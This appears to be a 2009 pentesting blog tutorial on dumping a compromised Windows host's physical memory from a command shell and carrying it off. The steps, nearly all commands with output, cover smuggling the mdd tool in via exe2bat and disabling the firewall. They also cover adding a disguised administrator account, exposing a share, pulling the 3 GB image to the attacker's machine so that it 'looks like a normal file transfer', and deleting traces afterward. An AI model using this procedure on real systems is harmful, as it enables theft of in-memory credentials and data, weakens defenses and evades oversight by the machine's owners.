Since in my last post I covered how to do this in meterpreter with the script I wrote, I decided to show how to do the same from command shell and you will see why I love Meterpreter and scripting Meterpreter so much!!
We start by downloading mdd in to our Backtrack4 machine.
root@bt:/pentest/windows-binaries# wget http://voxel.dl.sourceforge.net/sourceforge/mdd/mdd_1.3.exe --2009-03-10 14:01:49-- http://voxel.dl.sourceforge.net/sourceforge/mdd/mdd_1.3.exeResolving voxel.dl.sourceforge.net... 72.26.194.82Connecting to voxel.dl.sourceforge.net|72.26.194.82|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 95104 (93K) [application/octet-stream]Saving to: `mdd_1.3.exe'100%[=================================================================>] 95,104 175K/s in 0.5s2009-03-10 14:01:49 (175 KB/s) - `mdd_1.3.exe' saved [95104/95104]
We will be using exe2bat.exe that is available in the /pentest/windows-binaries/tools to be able to use this tool the executable has to be 64k or less do to the limitations of the windows debug command. When we check the size of the executable we can see that it is 93k of size.
root@bt:/pentest/windows-binaries# ls -lh mdd*-rw-r--r-- 1 root root 93K 2009-01-27 12:48 mdd_1.3.exe
We can compress the executable with UPX so as to be able to meet the 64k requirement, in Backtrack4 it will have to be installed using apt-get.
root@bt:/pentest/windows-binaries# upx -2 -o mdd.exe mdd_1.3.exeUltimate Packer for eXecutablesCopyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007UPX 3.01 Markus Oberhumer, Laszlo Molnar & John Reiser Jul 31st 2007File size Ratio Format Name-------------------- ------ ----------- -----------95104 -> 55168 58.01% win32/pe mdd.exePacked 1 file.
As you can see the executable is know 55k in size. In Backtrack 4 we use wine to run the exe2bat.exe executable to convert the exe into a batch file that we can paste in shell that will use debug to generate our executable on the target host.
root@bt:/pentest/windows-binaries/tools# wine exe2bat.exe ../mdd.exe mdd.txtFinished: ../mdd.exe > mdd.txt
We take the content of the mdd.txt and paste it into our command shell, you will see that you might get an error on the last line pasted, this is expected.
c:\Windows\System32>copy 1.dll ../mdd.exeThe syntax of the command is incorrect.
The problem was the case of the dll name (first time I have ever noticed that copy is case sensitive).
c:\Windows\System32>copy 1.dll ../mdd.exeThe syntax of the command is incorrect.c:\Windows\System32>copy 1.DLL mdd.exe1 file(s) copied.c:\Windows\System32>mdd-> mdd-> ManTech Physical Memory Dump UtilityCopyright (C) 2008 ManTech Security & Mission Assurance-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'This is free software, and you are welcome to redistribute itunder certain conditions; use option `-c' for details.-> ERROR: must specify output filename; use -h for usagec:\Windows\System32>
We can perform a check of the size of the physical memory on the target host with systeminfo this will give us an estimate of the image file that will be generated.
c:\Windows\System32>systeminfo | find /i "physical"Total Physical Memory: 3,070 MBAvailable Physical Memory: 859 MB
Now that mdd is on the target machine we can make an image of the memory, and dumping it locally.
c:\Windows\System32>mdd.exe -o memimg.dd-> mdd-> ManTech Physical Memory Dump UtilityCopyright (C) 2008 ManTech Security & Mission Assurance-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'This is free software, and you are welcome to redistribute itunder certain conditions; use option `-c' for details.-> Dumping 3070.34 MB of physical memory to file 'memimg.dd'.773770 map operations succeeded (0.98)12236 map operations failedtook 137 seconds to writeMD5 is: 888b9663c5d760f36f5b948ed92bef23
Once the image has been made we can use several methods to transfer the image to our target machine, this may be by tfpt, scripting ftp, mounting a share from our machine that we configured with samba or we can even create a share of our own and connect to it. I will demonstrate the task of creating a share since it might be the most useful when working in large teams against a single target host and most of the steps can be of use to others in different scenarios, we can share the folder and disable the local built in firewall to be able to gain access to the share.
c:\Windows\System32>net share img=c:\windows\system32img was shared successfully.
c:\Windows\System32>netsh.exe firewall set opmode disable
Ok.
Before we create and account we can check the Account Security Policy settings so as to save time by not doing trial and error on password length while creating our account for access.
c:\Windows\System32>net accountsForce user logoff how long after time expires?: NeverMinimum password age (days): 0Maximum password age (days): 455Minimum password length: 12Length of password history maintained: 6Lockout threshold: 10Lockout duration (minutes): 60Lockout observation window (minutes): 5Computer role: WORKSTATIONThe command completed successfully.
Now that we know the password length we can create and account and add it to the local Administrators we will use this account to mount the share we created.
c:\Windows\System32>net user /add SUPPORT_3089 P@ssword0001The command completed successfully.c:\Windows\System32>net localgroup Administrators /add SUPPORT_3089The command completed successfully.
Next we mount the share on our machine with the smbmount command and the credential of the user we created.
root@bt:/pentest/windows-binaries/tools# smbmount //192.168.1.192/img /mnt/img -o user=SUPPORT_3089,pass=P@ssword0001
Now that we have mounted the share we can copy over the file, this will look for anyone looking like a normal file transfer. As you will can see the image size is of 3GB.
root@bt:/mnt/img# ls -lh memimg.dd-rwxrwSrwx 1 root root 3.0G 2009-03-10 14:50 memimg.dd
Once we have copied over the image we must perform clean up of everything we did on the target host.
c:\Windows\System32>del memimg.ddc:\Windows\System32>del mdd.exec:\Windows\System32>net share /del imgimg was deleted successfully.c:\Windows\System32>net user /del SUPPORT_3089The command completed successfully.
c:\Windows\System32>netsh firewall set opmode enable
Ok.
I hope you have found this post of great use and please do share opinions and ideas.